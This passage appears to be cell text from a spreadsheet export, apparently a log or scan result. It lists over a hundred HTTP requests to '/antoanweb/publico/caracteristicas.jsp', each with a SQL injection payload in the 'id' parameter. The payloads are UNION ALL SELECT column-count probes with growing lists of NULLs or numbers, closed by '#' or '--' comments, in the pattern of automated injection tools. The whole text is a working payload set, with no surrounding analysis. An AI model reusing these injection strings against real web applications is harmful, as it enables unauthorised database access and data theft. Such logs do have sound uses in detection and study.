    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect4341,4341,4341,4341#and('uwki'like'uwki</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect5493,5493,5493,5493,5493#and('vuud'like'vuud</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect7157,7157,7157,7157,7157,7157#and('ykby'like'ykby</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect5913,5913,5913,5913,5913,5913,5913#and('okam'like'okam</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect4141,4141,4141,4141,4141,4141,4141,4141#and('akva'like'akva</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect2771,2771,2771,2771,2771,2771,2771,2771,2771#and('zadq'like'zadq</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect3123,3123,3123,3123,3123,3123,3123,3123,3123,3123#and('yrlt'like'yrlt</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null#and('upgg'like'upgg</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and('iyhq'like'iyhq</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and('mqim'like'mqim</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and('gnha'like'gnha</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('yosl'like'yosl</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('xzga'like'xzga</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('pwzg'like'pwzg</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('bqdb'like'bqdb</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('oomn'like'oomn</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('qxhg'like'qxhg</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect6839,6839,6839,6839,6839,6839,6839,6839,6839,6839,6839#and('cupe'like'cupe</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect7793,7793,7793,7793,7793,7793,7793,7793,7793,7793,7793,7793#and('atwy'like'atwy</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect710,710,710,710,710,710,710,710,710,710,710,710,710#and('itlz'like'itlz</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect4471,4471,4471,4471,4471,4471,4471,4471,4471,4471,4471,4471,4471,4471#and('meql'like'meql</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041,1041#and('axhz'like'axhz</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641,2641#and('kkbl'like'kkbl</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect1069,1069,1069,1069,1069,1069,1069,1069,1069,1069,1069,1069,1069,1069,1069,1069,1069#and('mnny'like'mnny</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795,795#and('ddim'like'ddim</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect9982,9982,9982,9982,9982,9982,9982,9982,9982,9982,9982,9982,9982,9982,9982,9982,9982,9982,9982#and('cgrd'like'cgrd</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect9487,9487,9487,9487,9487,9487,9487,9487,9487,9487,9487,9487,9487,9487,9487,9487,9487,9487,9487,9487#and('vexj'like'vexj</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('lszu'like'lszu</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('awci'like'awci</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('oaue'like'oaue</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('eiak'like'eiak</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('aabh'like'aabh</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('awvv'like'awvv</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('jpzw'like'jpzw</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('htur'like'htur</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('andv'like'andv</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('izrl'like'izrl</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723,4723#and('ogif'like'ogif</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect4416,4416,4416,4416,4416,4416,4416,4416,4416,4416,4416,4416,4416,4416,4416,4416,4416,4416,4416,4416,4416,4416#and('mkxn'like'mkxn</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect3818,3818,3818,3818,3818,3818,3818,3818,3818,3818,3818,3818,3818,3818,3818,3818,3818,3818,3818,3818,3818,3818,3818#and('ddey'like'ddey</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946,946#and('aisd'like'aisd</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect4478,4478,4478,4478,4478,4478,4478,4478,4478,4478,4478,4478,4478,4478,4478,4478,4478,4478,4478,4478,4478,4478,4478,4478,4478#and('exdf'like'exdf</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191,191#and('thqd'like'thqd</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789,2789#and('hwgs'like'hwgs</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570,8570#and('eenv'like'eenv</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957#and('mkye'like'mkye</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126,8126#and('cdkg'like'cdkg</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('qrpw'like'qrpw</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('jspn'like'jspn</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('htpq'like'htpq</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('uaiv'like'uaiv</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('tcsp'like'tcsp</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('ugbq'like'ugbq</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('mapd'like'mapd</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('yhva'like'yhva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#and('gznc'like'gznc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#and('ffmd'like'ffmd</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743,9743#and('dcoj'like'dcoj</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762,9762#and('jmts'like'jmts</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240,5240#and('lczm'like'lczm</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023,4023#and('yixd'like'yixd</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557,9557#and('yfrk'like'yfrk</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097,5097#and('adzh'like'adzh</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792,5792#and('scxp'like'scxp</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687,5687#and('xhdq'like'xhdq</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714,6714#and('rxtd'like'rxtd</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577,8577#and('rydm'like'rydm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#and('wuol'like'wuol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#and('djjh'like'djjh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#and('xrzk'like'xrzk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#and('dljl'like'dljl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#and('tefo'like'tefo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#and('dvnl'like'dvnl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,null#and('ssjh'like'ssjh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,null,null#and('fjyp'like'fjyp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,null,null,null#and('wlwb'like'wlwb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,null,null,null,null#and('fknh'like'fknh</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052,6052#and('vxke'like'vxke</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980,5980#and('tjed'like'tjed</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056,4056#and('umwo'like'umwo</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465,1465#and('jxbi'like'jxbi</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315,9315#and('kkqu'like'kkqu</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519,5519#and('ybnv'like'ybnv</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639,639#and('mihr'like'mihr</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720,2720#and('xsqj'like'xsqj</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119,7119#and('gdfc'like'gdfc</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910,5910#and('mvof'like'mvof</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull--and('mebw'like'mebw</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null--and('xvvj'like'xvvj</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null--and('hvjq'like'hvjq</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null--and('rsid'like'rsid</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null--and('ekcs'like'ekcs</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null--and('hikd'like'hikd</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null--and('ghyf'like'ghyf</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null--and('ekao'like'ekao</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null--and('khhs'like'khhs</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null--and('tmlr'like'tmlr</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect3464--and('afxd'like'afxd</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect5531,5531--and('xiux'like'xiux</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect6575,6575,6575--and('bfxd'like'bfxd</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect8484,8484,8484,8484--and('nkwu'like'nkwu</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect366,366,366,366,366--and('hkta'like'hkta</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect6464,6464,6464,6464,6464,6464--and('djjh'like'djjh</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect6953,6953,6953,6953,6953,6953,6953--and('zlzz'like'zlzz</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect2036,2036,2036,2036,2036,2036,2036,2036--and('oyty'like'oyty</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect7412,7412,7412,7412,7412,7412,7412,7412,7412--and('huxq'like'huxq</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect4753,4753,4753,4753,4753,4753,4753,4753,4753,4753--and('iaaw'like'iaaw</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null--and('gghl'like'gghl</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null--and('ikcf'like'ikcf</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null--and('rkis'like'rkis</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null--and('vcax'like'vcax</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('lsvs'like'lsvs</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('cgnd'like'cgnd</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('dzds'like'dzds</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('vxco'like'vxco</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('ojng'like'ojng</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('aqyt'like'aqyt</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect6418,6418,6418,6418,6418,6418,6418,6418,6418,6418,6418--and('thji'like'thji</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect6334,6334,6334,6334,6334,6334,6334,6334,6334,6334,6334,6334--and('lipd'like'lipd</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551,3551--and('mxgw'like'mxgw</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect3418,3418,3418,3418,3418,3418,3418,3418,3418,3418,3418,3418,3418,3418--and('piea'like'piea</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796,5796--and('llnk'like'llnk</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect1875,1875,1875,1875,1875,1875,1875,1875,1875,1875,1875,1875,1875,1875,1875,1875--and('dwdk'like'dwdk</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect3132,3132,3132,3132,3132,3132,3132,3132,3132,3132,3132,3132,3132,3132,3132,3132,3132--and('mhpp'like'mhpp</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028,2028--and('wrfk'like'wrfk</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect1036,1036,1036,1036,1036,1036,1036,1036,1036,1036,1036,1036,1036,1036,1036,1036,1036,1036,1036--and('cxpi'like'cxpi</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809,5809--and('wske'like'wske</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('lamc'like'lamc</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('ebjd'like'ebjd</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('hgkx'like'hgkx</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('mwhl'like'mwhl</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('htqm'like'htqm</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('tyko'like'tyko</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('sizz'like'sizz</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('iisw'like'iisw</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('bfqk'like'bfqk</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--and('xnuu'like'xnuu</t>
  </si>
  <si>
    <t>/antoanweb/publico/caracteristicas.jsp?id=d'z"0')unionallselect9719,9719,9719,9719,9719,9719,9719,9719,9719,9719,9719,9719,9719,9719,9719,9719,9719,9719,9719,9719,9719--and('almz'like'almz</t>
  </si>
  <si>
